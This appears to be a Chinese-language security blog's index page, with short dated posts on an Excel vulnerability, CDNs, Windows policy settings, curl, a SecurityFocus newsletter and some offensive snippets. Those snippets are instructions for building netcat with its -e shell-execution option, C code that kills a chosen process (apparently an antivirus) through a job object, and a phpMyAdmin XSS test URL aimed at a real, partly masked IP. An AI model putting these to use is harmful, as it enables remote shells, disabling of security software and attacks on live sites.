Apr 01
MS08-014, CVE 2008-0081, addresses a vulnerability in Excel whose root cause is an uninitialized stack variable. You probably have seen these types of compiler warnings before:
C:\temp>cl stack.cpp
Read the rest of this entry »
Mar 19
什么是CDN?
CDN的全称是内容分发网络。其目的是通过在现有的Internet中增加一层新的网络架构,将网站的内容发布到最接近用户的网络“边缘”,使用户可以就近取得所需的内容,提高用户访问网站的响应速度。
CDN有别于镜像,因为它比镜像更智能,或者可以做这样一个比喻:CDN=更智能的镜像+缓存+流量导流。因而,CDN可以明显提高Internet 网络中信息流动的效率。从技术上全面解决由于网络带宽小、用户访问量大、网点分布不均等问题,提高用户访问网站的响应速度。
CDN的类型特点
CDN的实现分为三类:镜像、高速缓存、专线。
镜像站点(Mirror Site),是最常见的,它让内容直接发布,适用于静态和准动态的数据同步。但是购买和维护新服务器的费用较高,还必须在各个地区设置镜像服务器,配备专业技术人员进行管理与维护。对于大型网站来说,更新所用的带宽成本也大大提高了。
高速缓存, 成本较低,适用于静态内容。Internet的统计表明,超过80%的用户经常访问的是20%的网站的内容,在这个规律下,缓存服务器可以处理大部分客户 的静态请求,而原始的服务器只需处理约20%左右的非缓存请求和动态请求,于是大大加快了客户请求的响应时间,并降低了原始服务器的负载。
专线,让用户直接访问数据源,可以实现数据的动态同步。
Mar 09
1. 单击“开始”,单击“运行”,键入 control admintools,然后单击“确定”。
2. 双击“本地安全策略”。
3. 单击“软件限制策略”。(注意:如果未列出软件限制,请右击“软件限制策略”,然后单击“新建策略”。 )
4. 在“对象类型”下,双击“强制”。
5. 单击“除本地管理员以外的所有用户”,然后单击“确定”。
重启后就可以正常安装了.
Jan 29
一个非常好用的工具。
D:\curl>curl –version
curl 7.17.1 (i386-pc-win32) libcurl/7.17.1 OpenSSL/0.9.8g zlib/1.2.3
Protocols: tftp ftp telnet dict ldap http file https ftps
Features: Largefile NTLM SSL libz
Jan 15
很简单。注释掉 netcat.c res_init 的那行
make linux
如何想编译出 -e 和 -t 选项, 只要加上两条define 语句即可。
#define GAPING_SECURITY_HOLE
#define TELNET
Dec 29
- #include "stdafx.h"
- #include <string.h>
- #include <iostream.h>
- #include<stdio.h>
- #include <stdlib.h>
- #include <windows.h>
- #pragma comment(lib,"Kernel32.lib")
- #include <winbase.h>
- int main(int argc, char* argv[])
- {
- BOOL res=FALSE;
- HANDLE hjob=CreateJobObject(NULL,TEXT("killrav")); //建立job对象,命名为killrav
- HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS,0,atoi(argv[1]));//打开进程
- if (hProcess==NULL) //打开失败
- {
- printf("\t\t OpenProcessError!please Look up your Privilege first ^_^\n");
- return 0;
- }
- AssignProcessToJobObject(hjob,hProcess);//将进程和对象关联起来
- res=TerminateJobObject(hjob,0);//结束对象
- if (res==FALSE) printf("\t\t Sorry ,can't kill the process you want \n");
- else
- printf("\t\t Ok ,Now you can check if the process still exists \n");
- return 0;
- }
对这种毫不负责的态度bs之
Dec 01
SecurityFocus Microsoft Newsletter #370
—————————————-
This issue is Sponsored by: SPI Dynamics
XPATH Injection Attacks- Web Hackers New Trick: White Paper
One particular form of injection attack, XPath Injection, is rapidly gaining in popularity due to the spread of AJAX applications and their inherent use of XML to store data. XPath Injection can be just as dangerous as SQL Injection, and can be even easier to exploit. Learn how to identify XPath Injection vulnerabilities and which methods of recourse to take to prevent them. Download this *FREE* white paper from SPI Dynamics for a complete guide to protection!
https://download.spidynamics.com/1/ad/XP.asp?Campaign_ID=70160000000D803
SECURITY BLOGS
SecurityFocus has selected a few syndicated sources that stand out as conveying topics of interest for our community. We are proud to offer content from Matasano at this time and will be adding more in the coming weeks.
http://www.securityfocus.com/blogs
——————————————————————
I. FRONT AND CENTER
1.Aye, Robot, or Can Computers Contract?
2.Don’t blame the IDS
II. MICROSOFT VULNERABILITY SUMMARY
1. Tencent QQ LaunchP2PShare Multiple Stack Buffer Overflow Vulnerabilities
2. VanDyke VShell Unspecified Denial Of Service Vulnerability
3. Samhain Labs Samhain Insecure Random Number Generator Information Disclosure Weakness
4. Skype Technologies Skype Voicemail URI Handler Remote Denial of Service Vulnerability
5. Apple QuickTime RTSP Response Header Content-Length Remote Buffer Overflow Vulnerability
6. Apple QuickTime RTSP Response Header Remote Stack Based Buffer Overflow Vulnerability
7. Wireshark 0.99.6 Multiple Remote Vulnerabilities
8. IBM Director CIM Server Remote Denial of Service Vulnerability
9. SMF Private Forum Messages Information Disclosure Vulnerability
10. Microsoft Windows Insecure Random Number Generator Information Disclosure Weakness
III. MICROSOFT FOCUS LIST SUMMARY
1. Windows NT Desktop
2. Security and Implications of Hosted Exchange
IV. UNSUBSCRIBE INSTRUCTIONS
V. SPONSOR INFORMATION
I. FRONT AND CENTER
———————
1.Aye, Robot, or Can Computers Contract?
By Mark Rasch
A contract is usually described as a “meeting of the minds.” One person makes an offer for goods or services; another person sees the offer and negotiates terms; the parties enter into an agreement of the offer; and some form of consideration is given in return for the provision of something of value. At least that’s what I remember from first year law school contracts class.
http://www.securityfocus.com/columnists/458
2.Don’t blame the IDS
By Don Parker
Some years ago, I remember reading a press release from the Gartner Group. It was about intrusion detection systems (IDS) offering little return for the monetary investment in them and furthermore, that this very same security technology would be obsolete by the year 2005. A rather bold statement and an even bolder prediction on their part.
http://www.securityfocus.com/columnists/457
II. MICROSOFT VULNERABILITY SUMMARY
————————————
1. Tencent QQ LaunchP2PShare Multiple Stack Buffer Overflow Vulnerabilities
BugTraq ID: 26613
Remote: Yes
Date Published: 2007-11-27
Relevant URL: http://www.securityfocus.com/bid/26613
Summary:
Tencent QQ is prone to multiple stack-based buffer-overflow vulnerabilities because the application fails to perform adequate boundary checks on user-supplied data.
Read the rest of this entry »
Nov 27
- $ grep -n convcharset libraries/auth/cookie.auth.lib.php
- 48: * @uses $GLOBALS['convcharset']
- 236:
- <input type="hidden" name="convcharset" value="<?php echo $GLOBALS['convcharset']; ?>" />
一切输入都是有害的。
Test:
- http://217.*.*.201/phpMyAdmin/index.php?convcharset=<script>alert(6code)</script>
Recent Comments